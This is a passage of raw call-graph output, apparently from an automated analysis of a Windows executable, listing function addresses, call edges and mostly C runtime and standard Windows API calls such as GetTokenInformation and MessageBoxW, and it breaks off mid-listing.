7ff6b7512283 17071->17074 17073 7ff6b7510c28 12 API calls 17072->17073 17076 7ff6b7512203 17072->17076 17073->17076 17075 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 17074->17075 17075->17076 17076->16987 17078 7ff6b75147d7 17077->17078 17250 7ff6b751d9b8 17078->17250 17084 7ff6b751ea39 17083->17084 17085 7ff6b751ea47 17083->17085 17084->17085 17086 7ff6b751ea67 17084->17086 17087 7ff6b75147c0 45 API calls 17084->17087 17085->16991 17088 7ff6b751ea78 17086->17088 17089 7ff6b751ea9f 17086->17089 17087->17086 17258 7ff6b75200a0 17088->17258 17089->17085 17091 7ff6b751eac9 17089->17091 17092 7ff6b751eb2a 17089->17092 17091->17085 17261 7ff6b751f8a0 17091->17261 17093 7ff6b751f8a0 _fread_nolock MultiByteToWideChar 17092->17093 17093->17085 17096 7ff6b7510bb7 17095->17096 17102 7ff6b7510ba6 17095->17102 17096->17102 17125 7ff6b751d5fc 17096->17125 17099 7ff6b7510bf8 17100 7ff6b751a948 __free_lconv_num 11 API calls 17099->17100 17100->17102 17101 7ff6b751a948 __free_lconv_num 11 API calls 17101->17099 17103 7ff6b751e570 17102->17103 17104 7ff6b751e58d 17103->17104 17105 7ff6b751e5c0 17103->17105 17106 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 17104->17106 17105->17104 17107 7ff6b751e5f2 17105->17107 17116 7ff6b75142a1 17106->17116 17111 7ff6b751e705 17107->17111 17120 7ff6b751e63a 17107->17120 17108 7ff6b751e7f7 17165 7ff6b751da5c 17108->17165 17110 7ff6b751e7bd 17158 7ff6b751ddf4 17110->17158 17111->17108 17111->17110 17113 7ff6b751e78c 17111->17113 17115 7ff6b751e74f 17111->17115 17118 7ff6b751e745 17111->17118 17151 7ff6b751e0d4 17113->17151 17141 7ff6b751e304 17115->17141 17116->17038 17116->17039 17118->17110 17119 7ff6b751e74a 17118->17119 17119->17113 17119->17115 17120->17116 17132 7ff6b751a4a4 17120->17132 17123 7ff6b751a900 _isindst 17 API calls 17124 7ff6b751e854 17123->17124 17126 7ff6b751d647 17125->17126 17130 7ff6b751d60b _get_daylight 17125->17130 17127 7ff6b7514f08 _get_daylight 11 API calls 17126->17127 17129 7ff6b7510be4 17127->17129 17128 7ff6b751d62e HeapAlloc 17128->17129 17128->17130 17129->17099 17129->17101 17130->17126 17130->17128 17131 7ff6b7523590 _get_daylight 2 API calls 17130->17131 17131->17130 17133 7ff6b751a4bb 17132->17133 17134 7ff6b751a4b1 17132->17134 17135 7ff6b7514f08 _get_daylight 11 API calls 17133->17135 17134->17133 17139 7ff6b751a4d6 17134->17139 17136 7ff6b751a4c2 17135->17136 17137 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 17136->17137 17138 7ff6b751a4ce 17137->17138 17138->17116 17138->17123 17139->17138 17140 7ff6b7514f08 _get_daylight 11 API calls 17139->17140 17140->17136 17174 7ff6b75240ac 17141->17174 17145 7ff6b751e3b0 17145->17116 17146 7ff6b751e401 17227 7ff6b751def0 17146->17227 17147 7ff6b751e3ac 17147->17145 17147->17146 17148 7ff6b751e3cc 17147->17148 17223 7ff6b751e1ac 17148->17223 17152 7ff6b75240ac 38 API calls 17151->17152 17153 7ff6b751e11e 17152->17153 17154 7ff6b7523af4 37 API calls 17153->17154 17155 7ff6b751e16e 17154->17155 17156 7ff6b751e172 17155->17156 17157 7ff6b751e1ac 45 API calls 17155->17157 17156->17116 17157->17156 17159 7ff6b75240ac 38 API calls 17158->17159 17160 7ff6b751de3f 17159->17160 17161 7ff6b7523af4 37 API calls 17160->17161 17162 7ff6b751de97 17161->17162 17163 7ff6b751de9b 17162->17163 17164 7ff6b751def0 45 API calls 17162->17164 17163->17116 17164->17163 17166 7ff6b751daa1 17165->17166 17167 7ff6b751dad4 17165->17167 17168 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 17166->17168 17169 7ff6b751daec 17167->17169 17172 7ff6b751db6d 17167->17172 17171 7ff6b751dacd __scrt_get_show_window_mode 17168->17171 17170 7ff6b751ddf4 46 API calls 17169->17170 17170->17171 17171->17116 17172->17171 17173 7ff6b75147c0 45 API calls 17172->17173 17173->17171 17175 7ff6b75240ff fegetenv 17174->17175 17176 7ff6b7527e2c 37 API calls 17175->17176 17181 7ff6b7524152 17176->17181 17177 7ff6b752417f 17180 7ff6b751a4a4 __std_exception_copy 37 API calls 17177->17180 17178 7ff6b7524242 17179 7ff6b7527e2c 37 API calls 17178->17179 17182 7ff6b752426c 17179->17182 17183 7ff6b75241fd 17180->17183 17181->17178 17184 7ff6b752416d 17181->17184 17185 7ff6b752421c 17181->17185 17186 7ff6b7527e2c 37 API calls 17182->17186 17187 7ff6b7525324 17183->17187 17193 7ff6b7524205 17183->17193 17184->17177 17184->17178 17188 7ff6b751a4a4 __std_exception_copy 37 API calls 17185->17188 17189 7ff6b752427d 17186->17189 17190 7ff6b751a900 _isindst 17 API calls 17187->17190 17188->17183 17191 7ff6b7528020 20 API calls 17189->17191 17192 7ff6b7525339 17190->17192 17201 7ff6b75242e6 __scrt_get_show_window_mode 17191->17201 17194 7ff6b750c550 _log10_special 8 API calls 17193->17194 17195 7ff6b751e351 17194->17195 17219 7ff6b7523af4 17195->17219 17196 7ff6b752468f __scrt_get_show_window_mode 17197 7ff6b75249cf 17198 7ff6b7523c10 37 API calls 17197->17198 17205 7ff6b75250e7 17198->17205 17199 7ff6b752497b 17199->17197 17202 7ff6b752533c memcpy_s 37 API calls 17199->17202 17200 7ff6b7524327 memcpy_s 17212 7ff6b7524c6b memcpy_s __scrt_get_show_window_mode 17200->17212 17218 7ff6b7524783 memcpy_s __scrt_get_show_window_mode 17200->17218 17201->17196 17201->17200 17203 7ff6b7514f08 _get_daylight 11 API calls 17201->17203 17202->17197 17204 7ff6b7524760 17203->17204 17206 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 17204->17206 17208 7ff6b752533c memcpy_s 37 API calls 17205->17208 17216 7ff6b7525142 17205->17216 17206->17200 17207 7ff6b75252c8 17210 7ff6b7527e2c 37 API calls 17207->17210 17208->17216 17209 7ff6b7514f08 11 API calls _get_daylight 17209->17212 17210->17193 17211 7ff6b7514f08 11 API calls _get_daylight 17211->17218 17212->17197 17212->17199 17212->17209 17217 7ff6b751a8e0 37 API calls _invalid_parameter_noinfo 17212->17217 17213 7ff6b7523c10 37 API calls 17213->17216 17214 7ff6b751a8e0 37 API calls _invalid_parameter_noinfo 17214->17218 17215 7ff6b752533c memcpy_s 37 API calls 17215->17216 17216->17207 17216->17213 17216->17215 17217->17212 17218->17199 17218->17211 17218->17214 17220 7ff6b7523b13 17219->17220 17221 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 17220->17221 17222 7ff6b7523b3e memcpy_s 17220->17222 17221->17222 17222->17147 17222->17222 17224 7ff6b751e1d8 memcpy_s 17223->17224 17225 7ff6b75147c0 45 API calls 17224->17225 17226 7ff6b751e292 memcpy_s __scrt_get_show_window_mode 17224->17226 17225->17226 17226->17145 17228 7ff6b751df78 memcpy_s 17227->17228 17229 7ff6b751df2b 17227->17229 17232 7ff6b751dfe3 17228->17232 17234 7ff6b75147c0 45 API calls 17228->17234 17230 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 17229->17230 17231 7ff6b751df57 17230->17231 17231->17145 17233 7ff6b751a4a4 __std_exception_copy 37 API calls 17232->17233 17237 7ff6b751e025 memcpy_s 17233->17237 17234->17232 17235 7ff6b751a900 _isindst 17 API calls 17236 7ff6b751e0d0 17235->17236 17237->17235 17239 7ff6b7510c5f 17238->17239 17240 7ff6b7510c4e 17238->17240 17239->17240 17241 7ff6b751d5fc _fread_nolock 12 API calls 17239->17241 17240->17058 17242 7ff6b7510c90 17241->17242 17243 7ff6b7510ca4 17242->17243 17244 7ff6b751a948 __free_lconv_num 11 API calls 17242->17244 17245 7ff6b751a948 __free_lconv_num 11 API calls 17243->17245 17244->17243 17245->17240 17247 7ff6b7514766 17246->17247 17248 7ff6b751476e 17246->17248 17249 7ff6b75147c0 45 API calls 17247->17249 17248->17069 17249->17248 17251 7ff6b75147ff 17250->17251 17252 7ff6b751d9d1 17250->17252 17254 7ff6b751da24 17251->17254 17252->17251 17253 7ff6b7523304 45 API calls 17252->17253 17253->17251 17255 7ff6b751da3d 17254->17255 17256 7ff6b751480f 17254->17256 17255->17256 17257 7ff6b7522650 45 API calls 17255->17257 17256->16991 17257->17256 17264 7ff6b7526d88 17258->17264 17263 7ff6b751f8a9 MultiByteToWideChar 17261->17263 17267 7ff6b7526dec 17264->17267 17265 7ff6b750c550 _log10_special 8 API calls 17266 7ff6b75200bd 17265->17266 17266->17085 17267->17265 17269 7ff6b7510ffd 17268->17269 17270 7ff6b751100f 17268->17270 17271 7ff6b7514f08 _get_daylight 11 API calls 17269->17271 17272 7ff6b751101d 17270->17272 17277 7ff6b7511059 17270->17277 17273 7ff6b7511002 17271->17273 17275 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 17272->17275 17274 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 17273->17274 17281 7ff6b751100d 17274->17281 17275->17281 17276 7ff6b75113d5 17279 7ff6b7514f08 _get_daylight 11 API calls 17276->17279 17276->17281 17277->17276 17278 7ff6b7514f08 _get_daylight 11 API calls 17277->17278 17280 7ff6b75113ca 17278->17280 17282 7ff6b7511669 17279->17282 17284 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 17280->17284 17281->16956 17283 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 17282->17283 17283->17281 17284->17276 17286 7ff6b7510704 17285->17286 17313 7ff6b7510464 17286->17313 17288 7ff6b751071d 17288->16609 17325 7ff6b75103bc 17289->17325 17293 7ff6b750c850 17292->17293 17294 7ff6b7502930 GetCurrentProcessId 17293->17294 17295 7ff6b7501c80 49 API calls 17294->17295 17296 7ff6b7502979 17295->17296 17339 7ff6b7514984 17296->17339 17301 7ff6b7501c80 49 API calls 17302 7ff6b75029ff 17301->17302 17369 7ff6b7502620 17302->17369 17305 7ff6b750c550 _log10_special 8 API calls 17306 7ff6b7502a31 17305->17306 17306->16648 17308 7ff6b7510119 17307->17308 17309 7ff6b7501b89 17307->17309 17310 7ff6b7514f08 _get_daylight 11 API calls 17308->17310 17309->16647 17309->16648 17311 7ff6b751011e 17310->17311 17312 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 17311->17312 17312->17309 17314 7ff6b75104ce 17313->17314 17315 7ff6b751048e 17313->17315 17314->17315 17316 7ff6b75104da 17314->17316 17317 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 17315->17317 17324 7ff6b751546c EnterCriticalSection 17316->17324 17323 7ff6b75104b5 17317->17323 17323->17288 17326 7ff6b75103e6 17325->17326 17327 7ff6b7501a20 17325->17327 17326->17327 17328 7ff6b7510432 17326->17328 17329 7ff6b75103f5 __scrt_get_show_window_mode 17326->17329 17327->16617 17327->16618 17338 7ff6b751546c EnterCriticalSection 17328->17338 17332 7ff6b7514f08 _get_daylight 11 API calls 17329->17332 17334 7ff6b751040a 17332->17334 17336 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 17334->17336 17336->17327 17342 7ff6b75149de 17339->17342 17340 7ff6b7514a03 17341 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 17340->17341 17345 7ff6b7514a2d 17341->17345 17342->17340 17343 7ff6b7514a3f 17342->17343 17378 7ff6b7512c10 17343->17378 17348 7ff6b750c550 _log10_special 8 API calls 17345->17348 17346 7ff6b7514b1c 17347 7ff6b751a948 __free_lconv_num 11 API calls 17346->17347 17347->17345 17350 7ff6b75029c3 17348->17350 17357 7ff6b7515160 17350->17357 17351 7ff6b7514b40 17351->17346 17354 7ff6b7514b4a 17351->17354 17352 7ff6b7514af1 17355 7ff6b751a948 __free_lconv_num 11 API calls 17352->17355 17353 7ff6b7514ae8 17353->17346 17353->17352 17356 7ff6b751a948 __free_lconv_num 11 API calls 17354->17356 17355->17345 17356->17345 17358 7ff6b751b2c8 _get_daylight 11 API calls 17357->17358 17359 7ff6b7515177 17358->17359 17360 7ff6b751eb98 _get_daylight 11 API calls 17359->17360 17362 7ff6b75151b7 17359->17362 17366 7ff6b75029e5 17359->17366 17361 7ff6b75151ac 17360->17361 17363 7ff6b751a948 __free_lconv_num 11 API calls 17361->17363 17362->17366 17516 7ff6b751ec20 17362->17516 17363->17362 17366->17301 17367 7ff6b751a900 _isindst 17 API calls 17368 7ff6b75151fc 17367->17368 17370 7ff6b750262f 17369->17370 17371 7ff6b7509390 2 API calls 17370->17371 17372 7ff6b7502660 17371->17372 17373 7ff6b7502683 MessageBoxA 17372->17373 17374 7ff6b750266f MessageBoxW 17372->17374 17375 7ff6b7502690 17373->17375 17374->17375 17376 7ff6b750c550 _log10_special 8 API calls 17375->17376 17377 7ff6b75026a0 17376->17377 17377->17305 17379 7ff6b7512c4e 17378->17379 17380 7ff6b7512c3e 17378->17380 17381 7ff6b7512c57 17379->17381 17388 7ff6b7512c85 17379->17388 17382 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 17380->17382 17383 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 17381->17383 17384 7ff6b7512c7d 17382->17384 17383->17384 17384->17346 17384->17351 17384->17352 17384->17353 17385 7ff6b75147c0 45 API calls 17385->17388 17387 7ff6b7512f34 17390 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 17387->17390 17388->17380 17388->17384 17388->17385 17388->17387 17392 7ff6b75135a0 17388->17392 17418 7ff6b7513268 17388->17418 17448 7ff6b7512af0 17388->17448 17390->17380 17393 7ff6b75135e2 17392->17393 17394 7ff6b7513655 17392->17394 17395 7ff6b75135e8 17393->17395 17396 7ff6b751367f 17393->17396 17397 7ff6b751365a 17394->17397 17398 7ff6b75136af 17394->17398 17399 7ff6b75135ed 17395->17399 17401 7ff6b75136be 17395->17401 17465 7ff6b7511b50 17396->17465 17400 7ff6b751368f 17397->17400 17405 7ff6b751365c 17397->17405 17398->17396 17398->17401 17416 7ff6b7513618 17398->17416 17407 7ff6b7513630 17399->17407 17408 7ff6b75135fd 17399->17408 17399->17416 17472 7ff6b7511740 17400->17472 17417 7ff6b75136ed 17401->17417 17479 7ff6b7511f60 17401->17479 17405->17408 17409 7ff6b751366b 17405->17409 17407->17417 17461 7ff6b75143c0 17407->17461 17408->17417 17451 7ff6b7513f04 17408->17451 17409->17396 17411 7ff6b7513670 17409->17411 17413 7ff6b7514558 37 API calls 17411->17413 17411->17417 17412 7ff6b750c550 _log10_special 8 API calls 17414 7ff6b7513983 17412->17414 17413->17416 17414->17388 17416->17417 17486 7ff6b751e858 17416->17486 17417->17412 17419 7ff6b7513289 17418->17419 17420 7ff6b7513273 17418->17420 17423 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 17419->17423 17431 7ff6b75132c7 17419->17431 17421 7ff6b75135e2 17420->17421 17422 7ff6b7513655 17420->17422 17420->17431 17424 7ff6b75135e8 17421->17424 17425 7ff6b751367f 17421->17425 17426 7ff6b751365a 17422->17426 17427 7ff6b75136af 17422->17427 17423->17431 17434 7ff6b75135ed 17424->17434 17438 7ff6b75136be 17424->17438 17430 7ff6b7511b50 38 API calls 17425->17430 17428 7ff6b751365c 17426->17428 17429 7ff6b751368f 17426->17429 17427->17425 17427->17438 17447 7ff6b7513618 17427->17447 17436 7ff6b751366b 17428->17436 17442 7ff6b75135fd 17428->17442 17432 7ff6b7511740 38 API calls 17429->17432 17430->17447 17431->17388 17432->17447 17433 7ff6b7513f04 47 API calls 17433->17447 17437 7ff6b7513630 17434->17437 17434->17442 17434->17447 17435 7ff6b7511f60 38 API calls 17435->17447 17436->17425 17440 7ff6b7513670 17436->17440 17439 7ff6b75143c0 47 API calls 17437->17439 17445 7ff6b75136ed 17437->17445 17438->17435 17438->17445 17439->17447 17443 7ff6b7514558 37 API calls 17440->17443 17440->17445 17441 7ff6b750c550 _log10_special 8 API calls 17444 7ff6b7513983 17441->17444 17442->17433 17442->17445 17443->17447 17444->17388 17445->17441 17446 7ff6b751e858 47 API calls 17446->17447 17447->17445 17447->17446 17499 7ff6b7510d14 17448->17499 17452 7ff6b7513f26 17451->17452 17453 7ff6b7510b80 12 API calls 17452->17453 17454 7ff6b7513f6e 17453->17454 17455 7ff6b751e570 46 API calls 17454->17455 17456 7ff6b7514041 17455->17456 17457 7ff6b7514063 17456->17457 17458 7ff6b75147c0 45 API calls 17456->17458 17459 7ff6b75147c0 45 API calls 17457->17459 17460 7ff6b75140ec 17457->17460 17458->17457 17459->17460 17460->17416 17462 7ff6b75143d8 17461->17462 17464 7ff6b7514440 17461->17464 17463 7ff6b751e858 47 API calls 17462->17463 17462->17464 17463->17464 17464->17416 17467 7ff6b7511b83 17465->17467 17466 7ff6b7511bb2 17468 7ff6b7510b80 12 API calls 17466->17468 17471 7ff6b7511bef 17466->17471 17467->17466 17469 7ff6b7511c6f 17467->17469 17468->17471 17470 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 17469->17470 17470->17471 17471->17416 17474 7ff6b7511773 17472->17474 17473 7ff6b75117a2 17475 7ff6b7510b80 12 API calls 17473->17475 17478 7ff6b75117df 17473->17478 17474->17473 17476 7ff6b751185f 17474->17476 17475->17478 17477 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 17476->17477 17477->17478 17478->17416 17480 7ff6b7511f93 17479->17480 17481 7ff6b7511fc2 17480->17481 17483 7ff6b751207f 17480->17483 17482 7ff6b7510b80 12 API calls 17481->17482 17484 7ff6b7511fff 17481->17484 17482->17484 17485 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 17483->17485 17484->17416 17485->17484 17487 7ff6b751e880 17486->17487 17488 7ff6b75147c0 45 API calls 17487->17488 17489 7ff6b751e8c5 17487->17489 17492 7ff6b751e885 __scrt_get_show_window_mode 17487->17492 17494 7ff6b751e8ae __scrt_get_show_window_mode 17487->17494 17488->17489 17489->17492 17489->17494 17496 7ff6b75207e8 17489->17496 17490 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 17490->17492 17492->17416 17494->17490 17494->17492 17498 7ff6b752080c WideCharToMultiByte 17496->17498 17500 7ff6b7510d41 17499->17500 17501 7ff6b7510d53 17499->17501 17502 7ff6b7514f08 _get_daylight 11 API calls 17500->17502 17504 7ff6b7510d60 17501->17504 17507 7ff6b7510d9d 17501->17507 17503 7ff6b7510d46 17502->17503 17505 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 17503->17505 17506 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 17504->17506 17512 7ff6b7510d51 17505->17512 17506->17512 17508 7ff6b7510e46 17507->17508 17510 7ff6b7514f08 _get_daylight 11 API calls 17507->17510 17509 7ff6b7514f08 _get_daylight 11 API calls 17508->17509 17508->17512 17511 7ff6b7510ef0 17509->17511 17513 7ff6b7510e3b 17510->17513 17515 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 17511->17515 17512->17388 17514 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 17513->17514 17514->17508 17515->17512 17521 7ff6b751ec3d 17516->17521 17517 7ff6b751ec42 17518 7ff6b75151dd 17517->17518 17519 7ff6b7514f08 _get_daylight 11 API calls 17517->17519 17518->17366 17518->17367 17520 7ff6b751ec4c 17519->17520 17522 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 17520->17522 17521->17517 17521->17518 17523 7ff6b751ec8c 17521->17523 17522->17518 17523->17518 17524 7ff6b7514f08 _get_daylight 11 API calls 17523->17524 17524->17520 17526 7ff6b75085b1 GetTokenInformation 17525->17526 17527 7ff6b7508633 __std_exception_destroy 17525->17527 17528 7ff6b75085dd 17526->17528 17529 7ff6b75085d2 GetLastError 17526->17529 17530 7ff6b7508646 CloseHandle 17527->17530 17531 7ff6b750864c 17527->17531 17528->17527 17532 7ff6b75085f9 GetTokenInformation 17528->17532 17529->17527 17529->17528 17530->17531 17531->16666 17532->17527 17534 7ff6b750861c 17532->17534 17533 7ff6b7508626 ConvertSidToStringSidW 17533->17527 17534->17527 17534->17533 17536 7ff6b750c850 17535->17536 17537 7ff6b7502b74 GetCurrentProcessId 17536->17537 17538 7ff6b75026b0 48 API calls 17537->17538 17539 7ff6b7502bc7 17538->17539 17540 7ff6b7514bd8 48 API calls 17539->17540 17541 7ff6b7502c10 MessageBoxW 17540->17541 17542 7ff6b750c550 _log10_special 8 API calls 17541->17542 17543 7ff6b7502c40 17542->17543 17543->16676 17545 7ff6b75025e5 17544->17545 17546 7ff6b7514bd8 48 API calls 17545->17546 17547 7ff6b7502604 17546->17547 17547->16692 17552 7ff6b75081dc 17551->17552 17553 7ff6b7509390 2 API calls 17552->17553 17554 7ff6b75081fb 17553->17554 17741 7ff6b750456a 17740->17741 17742 7ff6b7509390 2 API calls 17741->17742 17743 7ff6b750458f 17742->17743 17744 7ff6b750c550 _log10_special 8 API calls 17743->17744 17745 7ff6b75045b7 17744->17745 17745->16729 17747 7ff6b7507e2e 17746->17747 17748 7ff6b7507f52 17747->17748 17749 7ff6b7501c80 49 API calls 17747->17749 17750 7ff6b750c550 _log10_special 8 API calls 17748->17750 17754 7ff6b7507eb5 17749->17754 17751 7ff6b7507f83 17750->17751 17751->16729 17752 7ff6b7501c80 49 API calls 17752->17754 17753 7ff6b7504560 10 API calls 17753->17754 17754->17748 17754->17752 17754->17753 17755 7ff6b7507f0b 17754->17755 17756 7ff6b7509390 2 API calls 17755->17756 17759 7ff6b7501613 17758->17759 17760 7ff6b7501637 17758->17760 17879 7ff6b7501050 17759->17879 17761 7ff6b75045c0 108 API calls 17760->17761 17763 7ff6b750164b 17761->17763 17765 7ff6b7501653 17763->17765 17766 7ff6b7501682 17763->17766 17768 7ff6b7514f08 _get_daylight 11 API calls 17765->17768 17769 7ff6b75045c0 108 API calls 17766->17769 17771 7ff6b7501658 17768->17771 17772 7ff6b7501696 17769->17772 17807 7ff6b750718b 17806->17807 17809 7ff6b7507144 17806->17809 17807->16729 17809->17807 17943 7ff6b7515024 17809->17943 17811 7ff6b75041a1 17810->17811 17812 7ff6b75044e0 49 API calls 17811->17812 17813 7ff6b75041db 17812->17813 17814 7ff6b75044e0 49 API calls 17813->17814 17815 7ff6b75041eb 17814->17815 17816 7ff6b750420d 17815->17816 17817 7ff6b750423c 17815->17817 17855 7ff6b7501c80 49 API calls 17854->17855 17856 7ff6b7504474 17855->17856 17856->16729 17880 7ff6b75045c0 108 API calls 17879->17880 17881 7ff6b750108c 17880->17881 17882 7ff6b7501094 17881->17882 17883 7ff6b75010a9 17881->17883 17885 7ff6b7502710 54 API calls 17882->17885 17884 7ff6b75106d4 73 API calls 17883->17884 17944 7ff6b751505e 17943->17944 17945 7ff6b7515031 17943->17945 17946 7ff6b7515081 17944->17946 17949 7ff6b751509d 17944->17949 17947 7ff6b7514f08 _get_daylight 11 API calls 17945->17947 17954 7ff6b7514fe8 17945->17954 17948 7ff6b7514f08 _get_daylight 11 API calls 17946->17948 17950 7ff6b751503b 17947->17950 17952 7ff6b7514f4c 45 API calls 17949->17952 17957 7ff6b7515091 17952->17957 17954->17809 17957->17809 18022 7ff6b7515ec8 18021->18022 18023 7ff6b7515eee 18022->18023 18025 7ff6b7515f21 18022->18025 18024 7ff6b7514f08 _get_daylight 11 API calls 18023->18024 18026 7ff6b7515ef3 18024->18026 18028 7ff6b7515f27 18025->18028 18029 7ff6b7515f34 18025->18029 18027 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 18026->18027 18030 7ff6b7504616 18027->18030 18031 7ff6b7514f08 _get_daylight 11 API calls 18028->18031 18040 7ff6b751ac28 18029->18040 18030->16754 18031->18030 18053 7ff6b75202d8 EnterCriticalSection 18040->18053 18414 7ff6b75178f8 18413->18414 18417 7ff6b75173d4 18414->18417 18416 7ff6b7517911 18416->16764 18418 7ff6b751741e 18417->18418 18419 7ff6b75173ef 18417->18419 18427 7ff6b751546c EnterCriticalSection 18418->18427 18420 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 18419->18420 18422 7ff6b751740f 18420->18422 18422->18416 18429 7ff6b750fe43 18428->18429 18431 7ff6b750fe71 18428->18431 18430 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 18429->18430 18432 7ff6b750fe63 18430->18432 18431->18432 18438 7ff6b751546c EnterCriticalSection 18431->18438 18432->16768 18440 7ff6b75045c0 108 API calls 18439->18440 18441 7ff6b7501493 18440->18441 18546 7ff6b7506375 18545->18546 18547 7ff6b7501c80 49 API calls 18546->18547 18548 7ff6b75063b1 18547->18548 18549 7ff6b75063dd 18548->18549 18550 7ff6b75063ba 18548->18550 18552 7ff6b7504630 49 API calls 18549->18552 18551 7ff6b7502710 54 API calls 18550->18551 18568 7ff6b75063d3 18551->18568 18553 7ff6b75063f5 18552->18553 18835 7ff6b751b150 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18834->18835 18836 7ff6b751a3e1 18835->18836 18837 7ff6b751a504 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18836->18837 18838 7ff6b751a401 18837->18838 19593 7ff6b75208c8 19594 7ff6b75208ec 19593->19594 19598 7ff6b75208fc 19593->19598 19595 7ff6b7514f08 _get_daylight 11 API calls 19594->19595 19596 7ff6b75208f1 19595->19596 19597 7ff6b7520bdc 19600 7ff6b7514f08 _get_daylight 11 API calls 19597->19600 19598->19597 19599 7ff6b752091e 19598->19599 19602 7ff6b752093f 19599->19602 19724 7ff6b7520f84 19599->19724 19601 7ff6b7520be1 19600->19601 19603 7ff6b751a948 __free_lconv_num 11 API calls 19601->19603 19605 7ff6b75209b1 19602->19605 19606 7ff6b7520965 19602->19606 19622 7ff6b75209a5 19602->19622 19603->19596 19608 7ff6b751eb98 _get_daylight 11 API calls 19605->19608 19620 7ff6b7520974 19605->19620 19739 7ff6b75196c0 19606->19739 19610 7ff6b75209c7 19608->19610 19614 7ff6b751a948 __free_lconv_num 11 API calls 19610->19614 19612 7ff6b7520a5e 19617 7ff6b7520a7b 19612->19617 19623 7ff6b7520acd 19612->19623 19613 7ff6b751a948 __free_lconv_num 11 API calls 19613->19596 19618 7ff6b75209d5 19614->19618 19615 7ff6b752098d 19615->19622 19625 7ff6b7520f84 45 API calls 19615->19625 19616 7ff6b752096f 19619 7ff6b7514f08 _get_daylight 11 API calls 19616->19619 19621 7ff6b751a948 __free_lconv_num 11 API calls 19617->19621 19618->19620 19618->19622 19627 7ff6b751eb98 _get_daylight 11 API calls 19618->19627 19619->19620 19620->19613 19624 7ff6b7520a84 19621->19624 19622->19612 19622->19620 19745 7ff6b752712c 19622->19745 19623->19620 19626 7ff6b75233dc 40 API calls 19623->19626 19633 7ff6b7520a89 19624->19633 19781 7ff6b75233dc 19624->19781 19625->19622 19628 7ff6b7520b0a 19626->19628 19630 7ff6b75209f7 19627->19630 19631 7ff6b751a948 __free_lconv_num 11 API calls 19628->19631 19635 7ff6b751a948 __free_lconv_num 11 API calls 19630->19635 19636 7ff6b7520b14 19631->19636 19632 7ff6b7520ab5 19637 7ff6b751a948 __free_lconv_num 11 API calls 19632->19637 19634 7ff6b7520bd0 19633->19634 19639 7ff6b751eb98 _get_daylight 11 API calls 19633->19639 19638 7ff6b751a948 __free_lconv_num 11 API calls 19634->19638 19635->19622 19636->19620 19636->19633 19637->19633 19638->19596 19640 7ff6b7520b58 19639->19640 19641 7ff6b7520b69 19640->19641 19642 7ff6b7520b60 19640->19642 19644 7ff6b751a4a4 __std_exception_copy 37 API calls 19641->19644 19643 7ff6b751a948 __free_lconv_num 11 API calls 19642->19643 19645 7ff6b7520b67 19643->19645 19646 7ff6b7520b78 19644->19646 19650 7ff6b751a948 __free_lconv_num 11 API calls 19645->19650 19647 7ff6b7520c0b 19646->19647 19648 7ff6b7520b80 19646->19648 19649 7ff6b751a900 _isindst 17 API calls 19647->19649 19790 7ff6b7527244 19648->19790 19653 7ff6b7520c1f 19649->19653 19650->19596 19656 7ff6b7520c48 19653->19656 19663 7ff6b7520c58 19653->19663 19654 7ff6b7520ba7 19657 7ff6b7514f08 _get_daylight 11 API calls 19654->19657 19655 7ff6b7520bc8 19659 7ff6b751a948 __free_lconv_num 11 API calls 19655->19659 19658 7ff6b7514f08 _get_daylight 11 API calls 19656->19658 19660 7ff6b7520bac 19657->19660 19686 7ff6b7520c4d 19658->19686 19659->19634 19661 7ff6b751a948 __free_lconv_num 11 API calls 19660->19661 19661->19645 19662 7ff6b7520f3b 19665 7ff6b7514f08 _get_daylight 11 API calls 19662->19665 19663->19662 19664 7ff6b7520c7a 19663->19664 19667 7ff6b7520c97 19664->19667 19809 7ff6b752106c 19664->19809 19666 7ff6b7520f40 19665->19666 19669 7ff6b751a948 __free_lconv_num 11 API calls 19666->19669 19670 7ff6b7520d0b 19667->19670 19672 7ff6b7520cbf 19667->19672 19676 7ff6b7520cff 19667->19676 19669->19686 19674 7ff6b7520d33 19670->19674 19677 7ff6b751eb98 _get_daylight 11 API calls 19670->19677 19692 7ff6b7520cce 19670->19692 19671 7ff6b7520dbe 19685 7ff6b7520ddb 19671->19685 19693 7ff6b7520e2e 19671->19693 19824 7ff6b75196fc 19672->19824 19674->19676 19679 7ff6b751eb98 _get_daylight 11 API calls 19674->19679 19674->19692 19676->19671 19676->19692 19830 7ff6b7526fec 19676->19830 19681 7ff6b7520d25 19677->19681 19684 7ff6b7520d55 19679->19684 19680 7ff6b751a948 __free_lconv_num 11 API calls 19680->19686 19687 7ff6b751a948 __free_lconv_num 11 API calls 19681->19687 19682 7ff6b7520ce7 19682->19676 19691 7ff6b752106c 45 API calls 19682->19691 19683 7ff6b7520cc9 19688 7ff6b7514f08 _get_daylight 11 API calls 19683->19688 19689 7ff6b751a948 __free_lconv_num 11 API calls 19684->19689 19690 